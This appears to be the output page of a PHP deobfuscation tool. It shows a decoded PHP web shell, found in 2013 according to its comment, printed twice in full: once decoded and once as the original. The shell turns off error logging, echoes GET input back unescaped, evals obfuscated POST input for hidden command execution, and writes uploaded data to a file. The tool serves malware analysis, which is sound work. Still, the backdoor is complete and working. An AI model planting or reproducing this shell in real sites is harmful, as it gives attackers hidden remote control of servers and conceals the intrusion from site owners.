Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
/* * * I found this shell at 2013-02-18 * * This shell disables logging and error..
Decoded Output download
/*
*
* I found this shell at 2013-02-18
*
* This shell disables logging and error reporting and allows for XSS,
* command execution (the command is also obfuscated),
* and file uploads.
*/
<?php
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) {
print $_GET['r'];
} elseif (isset($_POST['e'])) {
eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
$data = file_get_contents('php://input');
if (strlen($data) > 0)
print 'STATUS-IMPORT-OK';
if (strlen($data) > 12) {
$fp=@fopen('tmpfile','a');
@flock($fp, LOCK_EX);
@fputs($fp, $_SERVER['REMOTE_ADDR']." ".base64_encode($data)."
");
@flock($fp, LOCK_UN);
@fclose($fp);
}
} exit;
?>
Did this file decode correctly?
Original Code
/*
*
* I found this shell at 2013-02-18
*
* This shell disables logging and error reporting and allows for XSS,
* command execution (the command is also obfuscated),
* and file uploads.
*/
<?php
@error_reporting(0);
@ini_set("display_errors",0);
@ini_set("log_errors",0);
@ini_set("error_log",0);
if (isset($_GET['r'])) {
print $_GET['r'];
} elseif (isset($_POST['e'])) {
eval(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
} elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
$data = file_get_contents('php://input');
if (strlen($data) > 0)
print 'STATUS-IMPORT-OK';
if (strlen($data) > 12) {
$fp=@fopen('tmpfile','a');
@flock($fp, LOCK_EX);
@fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
@flock($fp, LOCK_UN);
@fclose($fp);
}
} exit;
?>
Function Calls
ini_set | 3 |
error_reporting | 1 |
Stats
MD5 | 9ce8a9376e5e81d67407005a627e8de9 |
Eval Count | 0 |
Decode Time | 107 ms |